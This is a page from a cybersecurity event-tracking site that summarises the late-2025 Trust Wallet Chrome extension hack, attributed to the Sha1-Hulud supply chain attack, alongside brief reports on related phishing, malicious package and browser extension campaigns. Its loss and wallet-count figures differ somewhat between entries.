CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Sha1-Hulud Supply Chain Attack Results in $8.5 Million Trust Wallet Chrome Extension Hack

First reported
Last updated
2 unique sources, 5 articles

Summary

Hide ▲

On December 24, 2025, users of the Trust Wallet Chrome extension reported significant cryptocurrency losses after a compromised update (version 2.68.0) was released. The update contained malicious code that exfiltrated sensitive wallet data to an external server. Trust Wallet confirmed the security incident and released a patched version (2.69). Losses are estimated to exceed $8.5 million, with ongoing investigations into the incident. The malicious code iterated through all wallets stored in the extension and triggered a mnemonic phrase request for each wallet. The encrypted mnemonic was decrypted using the password or passkey entered during wallet unlock and sent to the attacker's server. The stolen funds include about $3 million in Bitcoin, $431 in Solana, and more than $3 million in Ethereum. The incident has claimed hundreds of victims, and Trust Wallet is actively finalizing the process to refund the impacted users. The stolen funds have been moved through centralized exchanges and cross-chain bridges for laundering and swapping. The backdoor incident originated from malicious source code modification within the internal Trust Wallet extension codebase. The attacker directly tampered with the application's own code and leveraged the legitimate PostHog analytics library as the data-exfiltration channel. There is a possibility that the incident is the work of a nation-state actor, and Changpeng Zhao hinted that the exploit was most likely carried out by an insider. Trust Wallet confirmed that approximately 2,596 wallets were drained in the attack and received around 5,000 claims, indicating a significant number of false or duplicate submissions. Trust Wallet has launched a dedicated claim form for affected users and warned about ongoing phishing campaigns.

Timeline

  1. 31.12.2025 18:29 1 articles · 23h ago

    Sha1-Hulud Supply Chain Attack Responsible for Trust Wallet Hack

    Trust Wallet revealed that the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, resulting in the theft of approximately $8.5 million in assets. The attacker gained access to Trust Wallet's browser extension source code and the Chrome Web Store (CWS) API key through exposed Developer GitHub secrets. The attacker registered the domain 'metrics-trustwallet[.]com' and pushed a trojanized version of the extension with a backdoor capable of harvesting users' wallet mnemonic phrases.

    Show sources
    Open in new tab
  2. 26.12.2025 17:31 3 articles · 6d ago

    Trust Wallet Confirms $7 Million Impact and Refund Process

    Trust Wallet confirmed that approximately $8.5 million has been impacted and will refund affected users. The stolen funds have been moved through centralized exchanges and cross-chain bridges for laundering and swapping. The backdoor incident originated from malicious source code modification within the internal Trust Wallet extension codebase. The attacker directly tampered with the application's own code and leveraged the legitimate PostHog analytics library as the data-exfiltration channel. There is a possibility that the incident is the work of a nation-state actor, and Changpeng Zhao hinted that the exploit was most likely carried out by an insider.

    Show sources
    Open in new tab
  3. 26.12.2025 11:47 5 articles · 6d ago

    Trust Wallet Chrome Extension Exploit Leads to Millions in Crypto Losses

    Trust Wallet confirmed that approximately 2,520 wallets were drained in the attack, with around 5,000 claims received, indicating a significant number of false or duplicate submissions. The company has launched a dedicated claim form for affected users and warned about ongoing phishing campaigns. Trust Wallet has also taken steps to block further attempts to release new versions and has reported the malicious exfiltration domain to NiceNIC, which promptly suspended it.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

OAuth Device Code Phishing Campaigns Target Microsoft 365 Accounts

A surge in phishing campaigns exploiting Microsoft’s OAuth device code authorization flow has been observed, targeting Microsoft 365 accounts. Both state-aligned and financially motivated actors are using social engineering to trick users into approving malicious applications, leading to account takeover and data theft. The attacks leverage the OAuth 2.0 device authorization grant, a legitimate process designed for devices with limited input capabilities. Once victims enter a device code generated by an attacker-controlled application, the threat actor receives a valid access token, granting control over the compromised account. The campaigns use QR codes, embedded buttons, and hyperlinked text to initiate the attack chain, often claiming to involve document sharing, token reauthorization, or security verification. The growth of these campaigns is linked to readily available phishing tools like SquarePhish2 and Graphish, which simplify device code abuse and require limited technical skill. Proofpoint observed financially motivated actor TA2723 and Russia-linked group UNK_AcademicFlare adopting this technique, targeting various sectors in the US and Europe. Organizations are advised to strengthen OAuth controls and train users to avoid entering device codes from untrusted sources. The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare. The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe. The adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender's Microsoft OneDrive account and instructs the victim to copy the provided code and click 'Next' to access the supposed document. Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish. To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that's not feasible, it's advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges.

Open in new tab

Malicious NuGet Package Tracer.Fody.NLog Steals Cryptocurrency Wallet Data

A malicious NuGet package named "Tracer.Fody.NLog" has been discovered, impersonating the legitimate "Tracer.Fody" library. The package, available for nearly six years, steals cryptocurrency wallet data from Stratis wallets and exfiltrates it to a Russian-controlled server. It has been downloaded over 2,000 times, with recent downloads occurring in the last six weeks. The threat actor used typosquatting and Cyrillic lookalike characters to evade detection. The package scans the default Stratis wallet directory on Windows, reads wallet files, and exfiltrates data silently without disrupting the host application. The same IP address was previously used in another NuGet impersonation attack in December 2023. Defenders are advised to be vigilant against similar threats targeting .NET projects.

Open in new tab

ShadyPanda Browser Extensions Campaign Exploits 4.3M Installs

The ShadyPanda campaign has amassed over 4.3 million installations of malicious Chrome and Edge browser extensions, evolving from legitimate tools into spyware over multiple phases. The extensions, discovered by Koi Security, engaged in affiliate fraud, search hijacking, and remote code execution. The campaign remains active on the Microsoft Edge Add-ons platform, with one extension having 3 million installs. The extensions collect browsing history, search queries, keystrokes, mouse clicks, and other sensitive data, exfiltrating it to domains in China. Users are advised to remove these extensions and reset their account passwords. The ShadyPanda campaign used a supply-chain attack tactic by publishing or acquiring harmless extensions, letting them run clean for years to build trust and gain millions of installs, then suddenly flipping them into malware via silent updates. The compromised extensions became a fully fledged remote code execution (RCE) framework inside the browser, capable of downloading and running arbitrary JavaScript with full access to the browser's data and capabilities. The extensions could steal session cookies and tokens, allowing them to impersonate entire SaaS accounts such as Microsoft 365 or Google Workspace. The risk of malicious browser extensions extends beyond individual users, as they can access cookies, local storage, cloud auth sessions, active web content, and file downloads, blurring the line between endpoint security and cloud security. Organizations should enforce extension allow lists, treat extension access like OAuth access, audit extension permissions regularly, and monitor for suspicious extension behavior to reduce the risk of malicious extensions. Modern SaaS security platforms, such as Reco's Dynamic SaaS Security platform, can help organizations monitor and detect suspicious activity related to browser extensions in real time.

Open in new tab

Malicious Chrome Extension Crypto Copilot Injects Hidden Solana Transfer Fees

A malicious Chrome extension named Crypto Copilot has been discovered injecting hidden Solana (SOL) transfer fees into Raydium swap transactions. The extension, available on the Chrome Web Store, siphons a minimum of 0.0013 SOL or 0.05% of the trade amount to an attacker-controlled wallet. The extension remains available with 12 installs as of November 2025, and its malicious behavior is concealed through obfuscation techniques. The extension communicates with a fake backend domain and uses legitimate services to appear trustworthy, while silently transferring fees to the attacker's wallet without user awareness.

Open in new tab

FBI Warns of $262M Stolen in Account Takeover Fraud Schemes

Since January 2025, cybercriminals impersonating bank support teams have stolen over $262 million through account takeover (ATO) fraud schemes. The FBI's Internet Crime Complaint Center (IC3) has received over 5,100 complaints, affecting individuals and businesses across various sectors. Criminals gain unauthorized access to online financial accounts using social engineering techniques or fraudulent websites. Once in control, they wire funds to crypto wallets and often change account passwords, making recovery difficult. The FBI advises monitoring financial accounts, using strong passwords, enabling MFA, and avoiding search results for banking websites. Victims are urged to contact their financial institutions immediately and file complaints with the IC3. Recent reports highlight the growing use of AI-powered phishing campaigns, SEO poisoning, and exploitation of e-commerce vulnerabilities, particularly ahead of the holiday season. Additionally, purchase scams and mobile phishing (mishing) sites have seen a significant increase, leveraging trusted brand names to deceive users. The U.S. Justice Department (DoJ) has seized the fraud domain web3adspanels[.]org, which was used to host and manipulate illegally harvested bank login credentials. The scheme targeted 19 victims across the U.S., including two companies in the Northern District of Georgia, with attempted losses of approximately $28 million and actual losses of approximately $14.6 million. The confiscated domain stored the stolen login credentials of thousands of victims and hosted a backend server to facilitate takeover fraud as recently as November 2025. The FBI and Estonian law enforcement collaborated in this seizure, and the domain now displays a law enforcement banner indicating it is under the control of authorities. No arrests have been made yet, but the investigation may reveal clues leading to the operators.

Open in new tab